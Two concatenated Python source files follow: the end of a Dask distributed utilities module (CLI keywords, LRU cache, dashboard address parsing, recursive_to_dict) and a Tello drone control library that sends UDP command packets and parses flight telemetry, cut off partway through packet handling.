"port_stop must be greater than port_start, but got "
f"{port_start=} and {port_stop=}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for newline-delimited string of log entries"""
def _repr_html_(self):
return get_template("log.html.j2").render(log=self)
class Logs(dict):
"""A container for a dict mapping names to strings of log entries"""
def _repr_html_(self):
return get_template("logs.html.j2").render(logs=self)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (that is, arguments that
are not part of Worker class), such as nworkers from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
from dask.utils import typename
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
f"Class {typename(cls)} does not support keyword {k}"
)
else:
raise ValueError(
f"Module {typename(cmd)} does not support keyword {k}"
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
(["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()), []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
# Retain context vars while deserializing; see https://bugs.python.org/issue34014
context = contextvars.copy_context()
return await loop.run_in_executor(
_offload_executor, lambda: context.run(fn, *args, **kwargs)
)
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> list[dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
_deprecations = {
"deserialize_for_cli": "dask.config.deserialize",
"serialize_for_cli": "dask.config.serialize",
"format_bytes": "dask.utils.format_bytes",
"format_time": "dask.utils.format_time",
"funcname": "dask.utils.funcname",
"parse_bytes": "dask.utils.parse_bytes",
"parse_timedelta": "dask.utils.parse_timedelta",
"typename": "dask.utils.typename",
"tmpfile": "dask.utils.tmpfile",
}
def __getattr__(name):
if name in _deprecations:
use_instead = _deprecations[name]
warnings.warn(
f"{name} is deprecated and will be removed in a future release. "
f"Please use {use_instead} instead.",
category=FutureWarning,
stacklevel=2,
)
return import_term(use_instead)
else:
raise AttributeError(f"module {__name__} has no attribute {name}")
# Used internally by recursive_to_dict to stop infinite recursion. If an object has
# already been encountered, a string representation will be returned instead. This is
# necessary since we have multiple cyclic referencing data structures.
_recursive_to_dict_seen: ContextVar[set[int]] = ContextVar("_recursive_to_dict_seen")
_to_dict_no_nest_flag = False
def recursive_to_dict(
obj: AnyType, *, exclude: Container[str] = (), members: bool = False
) -> AnyType:
"""Recursively convert arbitrary Python objects to a JSON-serializable
representation. This is intended for debugging purposes only.
The following objects are supported:
list, tuple, set, frozenset, deque, dict, dict_keys, dict_values
Descended into these objects recursively. Python-specific collections are
converted to JSON-friendly variants.
Classes that define ``_to_dict(self, *, exclude: Container[str] = ())``:
Call the method and dump its output
Classes that define ``_to_dict_no_nest(self, *, exclude: Container[str] = ())``:
Like above, but prevents nested calls (see below)
Other Python objects
Dump the output of ``repr()``
Objects already encountered before, regardless of type
Dump the output of ``repr()``. This breaks circular references and shortens the
output.
Parameters
----------
exclude:
A list of attribute names to be excluded from the dump.
This will be forwarded to the objects ``_to_dict`` methods and these methods
are required to accept this parameter.
members:
If True, convert the top-level Python object to a dict of its public members
**``_to_dict_no_nest`` vs. ``_to_dict``**
The presence of the ``_to_dict_no_nest`` method signals ``recursive_to_dict`` to
have a mutually exclusive full dict representation with other objects that also have
the ``_to_dict_no_nest``, regardless of their class. Only the outermost object in a
nested structure has the method invoked; all others are
dumped as their string repr instead, even if they were not encountered before.
Example:
.. code-block:: python
>>> class Person:
... def __init__(self, name):
... self.name = name
... self.children = []
... self.pets = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> class Pet:
... def __init__(self, name):
... self.name = name
... self.owners = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> alice = Person("Alice")
>>> bob = Person("Bob")
>>> charlie = Pet("Charlie")
>>> alice.children.append(bob)
>>> alice.pets.append(charlie)
>>> bob.pets.append(charlie)
>>> charlie.owners[:] = [alice, bob]
>>> recursive_to_dict({"people": [alice, bob], "pets": [charlie]})
{
"people": [
{"name": "Alice", "children": ["Bob"], "pets": ["Charlie"]},
{"name": "Bob", "children": [], "pets": ["Charlie"]},
],
"pets": [
{"name": "Charlie", "owners": ["Alice", "Bob"]},
],
}
If we changed the methods to ``_to_dict``, the output would instead be:
.. code-block:: python
{
"people": [
{
"name": "Alice",
"children": [
{
"name": "Bob",
"children": [],
"pets": [{"name": "Charlie", "owners": ["Alice", "Bob"]}],
},
],
pets: ["Charlie"],
],
"Bob",
],
"pets": ["Charlie"],
}
Also notice that, if in the future someone will swap the creation of the
``children`` and ``pets`` attributes inside ``Person.__init__``, the output with
``_to_dict`` will change completely whereas the one with ``_to_dict_no_nest`` won't!
"""
if isinstance(obj, (int, float, bool, str)) or obj is None:
return obj
if isinstance(obj, (type, bytes)):
return repr(obj)
if members:
obj = {
k: v
for k, v in inspect.getmembers(obj)
if not k.startswith("_") and k not in exclude and not callable(v)
}
# Prevent infinite recursion
try:
seen = _recursive_to_dict_seen.get()
except LookupError:
seen = set()
seen = seen.copy()
tok = _recursive_to_dict_seen.set(seen)
try:
if id(obj) in seen:
return repr(obj)
if hasattr(obj, "_to_dict_no_nest"):
global _to_dict_no_nest_flag
if _to_dict_no_nest_flag:
return repr(obj)
seen.add(id(obj))
_to_dict_no_nest_flag = True
try:
return obj._to_dict_no_nest(exclude=exclude)
finally:
_to_dict_no_nest_flag = False
seen.add(id(obj))
if hasattr(obj, "_to_dict"):
return obj._to_dict(exclude=exclude)
if isinstance(obj, (list, tuple, set, frozenset, deque, KeysView, ValuesView)):
return [recursive_to_dict(el, exclude=exclude) for el in obj]
if isinstance(obj, dict):
res = {}
for k, v in obj.items():
k = recursive_to_dict(k, exclude=exclude)
v = recursive_to_dict(v, exclude=exclude)
try:
res[k] = v
except TypeError:
res[str(k)] = v
return res
return repr(obj)
finally:
tok.var.reset(tok)
|
tello.py
|
import threading
import socket
import time
import datetime
import struct
import sys
import os
from . import crc
from . import logger
from . import event
from . import state
from . import error
from . import video_stream
from . utils import *
from . protocol import *
from . import dispatcher
log = logger.Logger('Tello')
class Tello(object):
EVENT_CONNECTED = event.Event('connected')
EVENT_WIFI = event.Event('wifi')
EVENT_LIGHT = event.Event('light')
EVENT_FLIGHT_DATA = event.Event('fligt_data')
EVENT_LOG_HEADER = event.Event('log_header')
EVENT_LOG = EVENT_LOG_HEADER
EVENT_LOG_RAWDATA = event.Event('log_rawdata')
EVENT_LOG_DATA = event.Event('log_data')
EVENT_LOG_CONFIG = event.Event('log_config')
EVENT_TIME = event.Event('time')
EVENT_VIDEO_FRAME = event.Event('video frame')
EVENT_VIDEO_DATA = event.Event('video data')
EVENT_DISCONNECTED = event.Event('disconnected')
EVENT_FILE_RECEIVED = event.Event('file received')
# internal events
__EVENT_CONN_REQ = event.Event('conn_req')
__EVENT_CONN_ACK = event.Event('conn_ack')
__EVENT_TIMEOUT = event.Event('timeout')
__EVENT_QUIT_REQ = event.Event('quit_req')
# for backward comaptibility
CONNECTED_EVENT = EVENT_CONNECTED
WIFI_EVENT = EVENT_WIFI
LIGHT_EVENT = EVENT_LIGHT
FLIGHT_EVENT = EVENT_FLIGHT_DATA
LOG_EVENT = EVENT_LOG
TIME_EVENT = EVENT_TIME
VIDEO_FRAME_EVENT = EVENT_VIDEO_FRAME
STATE_DISCONNECTED = state.State('disconnected')
STATE_CONNECTING = state.State('connecting')
STATE_CONNECTED = state.State('connected')
STATE_QUIT = state.State('quit')
LOG_ERROR = logger.LOG_ERROR
LOG_WARN = logger.LOG_WARN
LOG_INFO = logger.LOG_INFO
LOG_DEBUG = logger.LOG_DEBUG
LOG_ALL = logger.LOG_ALL
def __init__(self, net_int="wlan0", port=9000, tello_ip='192.168.10.1', cmd_port=8889, vid_port=6038):
self.tello_addr = (tello_ip, cmd_port)
self.tello_vid_port = vid_port
self.net_int = net_int # net interface
self.debug = False
self.pkt_seq_num = 0x01e4
self.port = port
self.udpsize = 2000
self.left_x = 0.0
self.left_y = 0.0
self.right_x = 0.0
self.right_y = 0.0
self.sock = None
self.state = self.STATE_DISCONNECTED
self.lock = threading.Lock()
self.connected = threading.Event()
self.video_enabled = False
self.prev_video_data_time = None
self.video_data_size = 0
self.video_data_loss = 0
self.log = log
self.exposure = 0
self.video_encoder_rate = 4
self.video_stream = None
self.wifi_strength = 0
self.log_data = LogData(log)
self.log_data_file = None
self.log_data_header_recorded = False
# video zoom state
self.zoom = False
# fast mode state
self.fast_mode = False
# File recieve state.
self.file_recv = {} # Map filenum -> protocol.DownloadedFile
# Create a UDP socket
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.setsockopt(socket.SOL_SOCKET, 25, self.net_int.encode()); # net interface bind
self.sock.bind(('', self.port))
self.sock.settimeout(2.0)
dispatcher.connect(self.__state_machine, dispatcher.signal.All)
threading.Thread(target=self.__recv_thread).start()
threading.Thread(target=self.__video_thread).start()
def set_loglevel(self, level):
"""
Set_loglevel controls the output messages. Valid levels are
LOG_ERROR, LOG_WARN, LOG_INFO, LOG_DEBUG and LOG_ALL.
"""
log.set_level(level)
def get_video_stream(self):
"""
Get_video_stream is used to prepare buffer object which receive video data from the drone.
"""
newly_created = False
self.lock.acquire()
log.info('get video stream')
try:
if self.video_stream is None:
self.video_stream = video_stream.VideoStream(self)
newly_created = True
res = self.video_stream
finally:
self.lock.release()
if newly_created:
self.__send_exposure()
self.__send_video_encoder_rate()
self.start_video()
return res
def connect(self):
"""Connect is used to send the initial connection request to the drone."""
self.__publish(event=self.__EVENT_CONN_REQ)
def wait_for_connection(self, timeout=None):
"""Wait_for_connection will block until the connection is established."""
if not self.connected.wait(timeout):
raise error.TelloError('timeout')
def __send_conn_req(self):
port = 9617
port0 = (int(port/1000) % 10) << 4 | (int(port/100) % 10)
port1 = (int(port/10) % 10) << 4 | (int(port/1) % 10)
buf = 'conn_req:%c%c' % (chr(port0), chr(port1))
log.info('send connection request (cmd="%s%02x%02x")' % (str(buf[:-2]), port0, port1))
return self.send_packet(Packet(buf))
def subscribe(self, signal, handler):
"""Subscribe a event such as EVENT_CONNECTED, EVENT_FLIGHT_DATA, EVENT_VIDEO_FRAME and so on."""
dispatcher.connect(handler, signal)
def __publish(self, event, data=None, **args):
args.update({'data': data})
if 'signal' in args:
del args['signal']
if 'sender' in args:
del args['sender']
log.debug('publish signal=%s, args=%s' % (event, args))
dispatcher.send(event, sender=self, **args)
def takeoff(self):
"""Takeoff tells the drones to liftoff and start flying."""
log.info('set altitude limit 30m')
pkt = Packet(SET_ALT_LIMIT_CMD)
pkt.add_byte(0x1e) # 30m
pkt.add_byte(0x00)
self.send_packet(pkt)
log.info('takeoff (cmd=0x%02x seq=0x%04x)' % (TAKEOFF_CMD, self.pkt_seq_num))
pkt = Packet(TAKEOFF_CMD)
pkt.fixup()
return self.send_packet(pkt)
def throw_and_go(self):
"""Throw_and_go starts a throw and go sequence"""
log.info('throw_and_go (cmd=0x%02x seq=0x%04x)' % (THROW_AND_GO_CMD, self.pkt_seq_num))
pkt = Packet(THROW_AND_GO_CMD, 0x48)
pkt.add_byte(0x00)
pkt.fixup()
return self.send_packet(pkt)
def land(self):
"""Land tells the drone to come in for landing."""
log.info('land (cmd=0x%02x seq=0x%04x)' % (LAND_CMD, self.pkt_seq_num))
pkt = Packet(LAND_CMD)
pkt.add_byte(0x00)
pkt.fixup()
return self.send_packet(pkt)
def palm_land(self):
"""Tells the drone to wait for a hand underneath it and then land."""
log.info('palmland (cmd=0x%02x seq=0x%04x)' % (PALM_LAND_CMD, self.pkt_seq_num))
pkt = Packet(PALM_LAND_CMD)
pkt.add_byte(0x00)
pkt.fixup()
return self.send_packet(pkt)
def quit(self):
"""Quit stops the internal threads."""
log.info('quit')
self.__publish(event=self.__EVENT_QUIT_REQ)
def get_alt_limit(self):
''' ... '''
self.log.debug('get altitude limit (cmd=0x%02x seq=0x%04x)' % (
ALT_LIMIT_MSG, self.pkt_seq_num))
pkt = Packet(ALT_LIMIT_MSG)
pkt.fixup()
return self.send_packet(pkt)
def set_alt_limit(self, limit):
self.log.info('set altitude limit=%s (cmd=0x%02x seq=0x%04x)' % (
int(limit), SET_ALT_LIMIT_CMD, self.pkt_seq_num))
pkt = Packet(SET_ALT_LIMIT_CMD)
pkt.add_byte(int(limit))
pkt.add_byte(0x00)
pkt.fixup()
self.send_packet(pkt)
self.get_alt_limit()
def get_att_limit(self):
''' ... '''
self.log.debug('get attitude limit (cmd=0x%02x seq=0x%04x)' % (
ATT_LIMIT_MSG, self.pkt_seq_num))
pkt = Packet(ATT_LIMIT_MSG)
pkt.fixup()
return self.send_packet(pkt)
def set_att_limit(self, limit):
self.log.info('set attitude limit=%s (cmd=0x%02x seq=0x%04x)' % (
int(limit), ATT_LIMIT_CMD, self.pkt_seq_num))
pkt = Packet(ATT_LIMIT_CMD)
pkt.add_byte(0x00)
pkt.add_byte(0x00)
pkt.add_byte( int(float_to_hex(float(limit))[4:6], 16) ) # 'attitude limit' formatted in float of 4 bytes
pkt.add_byte(0x41)
pkt.fixup()
self.send_packet(pkt)
self.get_att_limit()
def get_low_bat_threshold(self):
''' ... '''
self.log.debug('get low battery threshold (cmd=0x%02x seq=0x%04x)' % (
LOW_BAT_THRESHOLD_MSG, self.pkt_seq_num))
pkt = Packet(LOW_BAT_THRESHOLD_MSG)
pkt.fixup()
return self.send_packet(pkt)
def set_low_bat_threshold(self, threshold):
self.log.info('set low battery threshold=%s (cmd=0x%02x seq=0x%04x)' % (
int(threshold), LOW_BAT_THRESHOLD_CMD, self.pkt_seq_num))
pkt = Packet(LOW_BAT_THRESHOLD_CMD)
pkt.add_byte(int(threshold))
pkt.fixup()
self.send_packet(pkt)
self.get_low_bat_threshold()
def __send_time_command(self):
log.info('send_time (cmd=0x%02x seq=0x%04x)' % (TIME_CMD, self.pkt_seq_num))
pkt = Packet(TIME_CMD, 0x50)
pkt.add_byte(0)
pkt.add_time()
pkt.fixup()
return self.send_packet(pkt)
def __send_start_video(self):
pkt = Packet(VIDEO_START_CMD, 0x60)
pkt.fixup()
return self.send_packet(pkt)
def __send_video_mode(self, mode):
pkt = Packet(VIDEO_MODE_CMD)
pkt.add_byte(mode)
pkt.fixup()
return self.send_packet(pkt)
def set_video_mode(self, zoom=False):
"""Tell the drone whether to capture 960x720 4:3 video, or 1280x720 16:9 zoomed video.
4:3 has a wider field of view (both vertically and horizontally), 16:9 is crisper."""
log.info('set video mode zoom=%s (cmd=0x%02x seq=0x%04x)' % (
zoom, VIDEO_START_CMD, self.pkt_seq_num))
self.zoom = zoom
return self.__send_video_mode(int(zoom))
def start_video(self):
"""Start_video tells the drone to send start info (SPS/PPS) for video stream."""
log.info('start video (cmd=0x%02x seq=0x%04x)' % (VIDEO_START_CMD, self.pkt_seq_num))
self.video_enabled = True
self.__send_exposure()
self.__send_video_encoder_rate()
return self.__send_start_video()
def set_exposure(self, level):
"""Set_exposure sets the drone camera exposure level. Valid levels are 0, 1, and 2."""
if level < 0 or 2 < level:
raise error.TelloError('Invalid exposure level')
log.info('set exposure (cmd=0x%02x seq=0x%04x)' % (EXPOSURE_CMD, self.pkt_seq_num))
self.exposure = level
return self.__send_exposure()
def __send_exposure(self):
pkt = Packet(EXPOSURE_CMD, 0x48)
pkt.add_byte(self.exposure)
pkt.fixup()
return self.send_packet(pkt)
def set_video_encoder_rate(self, rate):
"""Set_video_encoder_rate sets the drone video encoder rate."""
log.info('set video encoder rate (cmd=0x%02x seq=%04x)' %
(VIDEO_ENCODER_RATE_CMD, self.pkt_seq_num))
self.video_encoder_rate = rate
return self.__send_video_encoder_rate()
def __send_video_encoder_rate(self):
pkt = Packet(VIDEO_ENCODER_RATE_CMD, 0x68)
pkt.add_byte(self.video_encoder_rate)
pkt.fixup()
return self.send_packet(pkt)
def take_picture(self):
log.info('take picture')
return self.send_packet_data(TAKE_PICTURE_COMMAND, type=0x68)
def up(self, val):
"""Up tells the drone to ascend. Pass in an int from 0-100."""
log.info('up(val=%d)' % val)
self.left_y = val / 100.0
def down(self, val):
"""Down tells the drone to descend. Pass in an int from 0-100."""
log.info('down(val=%d)' % val)
self.left_y = val / 100.0 * -1
def forward(self, val):
"""Forward tells the drone to go forward. Pass in an int from 0-100."""
log.info('forward(val=%d)' % val)
self.right_y = val / 100.0
def backward(self, val):
"""Backward tells the drone to go in reverse. Pass in an int from 0-100."""
log.info('backward(val=%d)' % val)
self.right_y = val / 100.0 * -1
def right(self, val):
"""Right tells the drone to go right. Pass in an int from 0-100."""
log.info('right(val=%d)' % val)
self.right_x = val / 100.0
def left(self, val):
"""Left tells the drone to go left. Pass in an int from 0-100."""
log.info('left(val=%d)' % val)
self.right_x = val / 100.0 * -1
def clockwise(self, val):
"""
Clockwise tells the drone to rotate in a clockwise direction.
Pass in an int from 0-100.
"""
log.info('clockwise(val=%d)' % val)
self.left_x = val / 100.0
def counter_clockwise(self, val):
"""
CounterClockwise tells the drone to rotate in a counter-clockwise direction.
Pass in an int from 0-100.
"""
log.info('counter_clockwise(val=%d)' % val)
self.left_x = val / 100.0 * -1
def flip_forward(self):
"""flip_forward tells the drone to perform a forwards flip"""
log.info('flip_forward (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipFront)
pkt.fixup()
return self.send_packet(pkt)
def flip_back(self):
"""flip_back tells the drone to perform a backwards flip"""
log.info('flip_back (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipBack)
pkt.fixup()
return self.send_packet(pkt)
def flip_right(self):
"""flip_right tells the drone to perform a right flip"""
log.info('flip_right (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipRight)
pkt.fixup()
return self.send_packet(pkt)
def flip_left(self):
"""flip_left tells the drone to perform a left flip"""
log.info('flip_left (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipLeft)
pkt.fixup()
return self.send_packet(pkt)
def flip_forwardleft(self):
"""flip_forwardleft tells the drone to perform a forwards left flip"""
log.info('flip_forwardleft (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipForwardLeft)
pkt.fixup()
return self.send_packet(pkt)
def flip_backleft(self):
"""flip_backleft tells the drone to perform a backwards left flip"""
log.info('flip_backleft (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipBackLeft)
pkt.fixup()
return self.send_packet(pkt)
def flip_forwardright(self):
"""flip_forwardright tells the drone to perform a forwards right flip"""
log.info('flip_forwardright (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipForwardRight)
pkt.fixup()
return self.send_packet(pkt)
def flip_backright(self):
"""flip_backleft tells the drone to perform a backwards right flip"""
log.info('flip_backright (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipBackRight)
pkt.fixup()
return self.send_packet(pkt)
def __fix_range(self, val, min=-1.0, max=1.0):
if val < min:
val = min
elif val > max:
val = max
return val
def set_throttle(self, throttle):
"""
Set_throttle controls the vertical up and down motion of the drone.
Pass in an int from -1.0 ~ 1.0. (positive value means upward)
"""
if self.left_y != self.__fix_range(throttle):
log.info('set_throttle(val=%4.2f)' % throttle)
self.left_y = self.__fix_range(throttle)
def set_yaw(self, yaw):
"""
Set_yaw controls the left and right rotation of the drone.
Pass in an int from -1.0 ~ 1.0. (positive value will make the drone turn to the right)
"""
if self.left_x != self.__fix_range(yaw):
log.info('set_yaw(val=%4.2f)' % yaw)
self.left_x = self.__fix_range(yaw)
def set_pitch(self, pitch):
"""
Set_pitch controls the forward and backward tilt of the drone.
Pass in an int from -1.0 ~ 1.0. (positive value will make the drone move forward)
"""
if self.right_y != self.__fix_range(pitch):
log.info('set_pitch(val=%4.2f)' % pitch)
self.right_y = self.__fix_range(pitch)
def set_roll(self, roll):
"""
Set_roll controls the the side to side tilt of the drone.
Pass in an int from -1.0 ~ 1.0. (positive value will make the drone move to the right)
"""
if self.right_x != self.__fix_range(roll):
log.info('set_roll(val=%4.2f)' % roll)
self.right_x = self.__fix_range(roll)
def toggle_fast_mode(self):
if self.fast_mode:
self.fast_mode = False
elif not self.fast_mode:
self.fast_mode = True
def manual_takeoff(self):
# Hold max 'yaw' and min 'pitch', 'roll', 'throttle' for several seconds
self.set_pitch(-1)
self.set_roll(-1)
self.set_yaw(1)
self.set_throttle(-1)
self.fast_mode = False
def __send_stick_command(self):
pkt = Packet(STICK_CMD, 0x60)
axis1 = int(1024 + 660.0 * self.right_x) & 0x7ff
axis2 = int(1024 + 660.0 * self.right_y) & 0x7ff
axis3 = int(1024 + 660.0 * self.left_y) & 0x7ff
axis4 = int(1024 + 660.0 * self.left_x) & 0x7ff
axis5 = int(self.fast_mode) & 0x01
'''
11 bits (-1024 ~ +1023) x 4 axis = 44 bits
fast_mode takes 1 bit
44 bits will be packed in to 6 bytes (48 bits)
axis4 axis3 axis2 axis1
| | | | |
4 3 2 1 0
98765432109876543210987654321098765432109876543210
| | | | | | |
byte5 byte4 byte3 byte2 byte1 byte0
'''
log.debug("stick command: fast=%d yaw=%4d thr=%4d pit=%4d rol=%4d" %
(axis5, axis4, axis3, axis2, axis1))
log.debug("stick command: fast=%04x yaw=%04x thr=%04x pit=%04x rol=%04x" %
(axis5, axis4, axis3, axis2, axis1))
packed = axis1 | (axis2 << 11) | (
axis3 << 22) | (axis4 << 33) | (axis5 << 44)
packed_bytes = struct.pack('<Q', packed)
pkt.add_byte(byte(packed_bytes[0]))
pkt.add_byte(byte(packed_bytes[1]))
pkt.add_byte(byte(packed_bytes[2]))
pkt.add_byte(byte(packed_bytes[3]))
pkt.add_byte(byte(packed_bytes[4]))
pkt.add_byte(byte(packed_bytes[5]))
pkt.add_time()
pkt.fixup()
log.debug("stick command: %s" % byte_to_hexstring(pkt.get_buffer()))
return self.send_packet(pkt)
def __send_ack_log(self, id):
pkt = Packet(LOG_HEADER_MSG, 0x50)
pkt.add_byte(0x00)
b0, b1 = le16(id)
pkt.add_byte(b0)
pkt.add_byte(b1)
pkt.fixup()
return self.send_packet(pkt)
def send_packet(self, pkt):
"""Send_packet is used to send a command packet to the drone."""
try:
cmd = pkt.get_buffer()
self.sock.sendto(cmd, self.tello_addr)
log.debug("send_packet: %s" % byte_to_hexstring(cmd))
except socket.error as err:
if self.state == self.STATE_CONNECTED:
log.error("send_packet: %s" % str(err))
else:
log.info("send_packet: %s" % str(err))
return False
return True
def send_packet_data(self, command, type=0x68, payload=[]):
pkt = Packet(command, type, payload)
pkt.fixup()
return self.send_packet(pkt)
def __process_packet(self, data):
if isinstance(data, str):
data = bytearray([x for x in data])
if str(data[0:9]) == 'conn_ack:' or data[0:9] == b'conn_ack:':
log.info('connected. (port=%2x%2x)' % (data[9], data[10]))
log.debug(' %s' % byte_to_hexstring(data))
if self.video_enabled:
self.__send_exposure()
self.__send_video_encoder_rate()
self.__send_start_video()
self.__publish(self.__EVENT_CONN_ACK, data)
return True
if data[0] != START_OF_PACKET:
log.info('start of packet != %02x (%02x) (ignored)' % (START_OF_PACKET, data[0]))
log.info(' %s' % byte_to_hexstring(data))
log.info(' %s' % str(map(chr, data))[1:-1])
return False
pkt = Packet(data)
cmd = uint16(data[5], data[6])
if cmd == LOG_HEADER_MSG:
id = uint16(data[9], data[10])
log.info("recv: log_header: id=%04x, '%s'" % (id, str(data[28:54])))
log.debug("recv: log_header: %s" % byte_to_hexstring(data[9:]))
self.__send_ack_log(id)
self.__publish(event=self.EVENT_LOG_HEADER, data=data[9:])
if self.log_data_file and not self.log_data_header_recorded:
self.log_data_file.write(data[12:-2])
self.log_data_header_recorded = True
elif cmd == LOG_DATA_MSG:
log.debug("recv: log_data: length=%d, %s" % (len(data[9:]), byte_to_hexstring(data[9:])))
self.__publish(event=self.EVENT_LOG_RAWDATA, data=data[9:])
try:
self.log_data.update(data[10:])
if self.log_data_file:
self.log_data_file.write(data[10:-2])
except Exception as ex:
log.error('%s' % str(ex))
self.__publish(event=self.EVENT_LOG_DATA, data=self.log_data)
elif cmd == LOG_CONFIG_MSG:
log.debug("recv: log_config: length=%d, %s" % (len(data[9:]), byte_to_hexstring(data[9:])))
self.__publish(event=self.EVENT_LOG_CONFIG, data=data[9:])
elif cmd == WIFI_MSG:
log.debug("recv: wifi: %s" % byte_to_hexstring(data[9:]))
self.wifi_strength = data[9]
self.__publish(event=self.EVENT_WIFI, data=data[9:])
elif cmd == ALT_LIMIT_MSG:
log.info("recv: altitude limit: %s" % byte_to_hexstring(data[9:-2]))
elif cmd == ATT_LIMIT_MSG:
log.info("recv: attitude limit: %s" % byte_to_hexstring(data[9:-2]))
elif cmd == LOW_BAT_THRESHOLD_MSG:
log.info("recv: low battery threshold: %s" % byte_to_hexstring(data[9:-2]))
elif cmd == LIGHT_MSG:
log.debug("recv: light: %s" % byte_to_hexstring(data[9:-2]))
self.__publish(event=self.EVENT_LIGHT, data=data[9:])
elif cmd == FLIGHT_MSG:
flight_data = FlightData(data[9:])
flight_data.wifi_strength = self.wifi_strength
log.debug("recv: flight data: %s" % str(flight_data))
self.__publish(event=self.EVENT_FLIGHT_DATA, data=flight_data)
elif cmd == TIME_CMD:
log.debug("recv: time data: %s" % byte_to_hexstring(data))
self.__publish(event=self.EVENT_TIME, data=data[7:9])
elif cmd in (SET_ALT_LIMIT_CMD, ATT_LIMIT_CMD, LOW_BAT_THRESHOLD_CMD, TAKEOFF_CMD, LAND_CMD, VIDEO_START_CMD, VIDEO_ENCODER_RATE_CMD, PALM_LAND_CMD,
EXPOSURE_CMD, THROW_AND_GO_CMD, EMERGENCY_CMD):
log.debug("recv: ack: cmd=0x%02x seq=0x%04x %s" %
(uint16(data[5], data[6]), uint16(data[7], data[8]), byte_to_hexstring(data)))
elif cmd == TELLO_CMD_FILE_SIZE:
# Drone is about to send us a file. Get ready.
# N.b. one of the fields in the packet is a file ID; by demuxing
# based on file ID we can receive multiple files at once. This
# code doesn't support that yet, though, so don't take one photo
# while another is still being received.
log.info("recv: file size: %s" % byte_to_hexstring(data))
if len(pkt.get_data()) >= 7:
(size, filenum) = struct.unpack('<xLH', pkt.get_data())
log.info(' file size: num=%d bytes=%d' % (filenum, size))
# Initialize file download state.
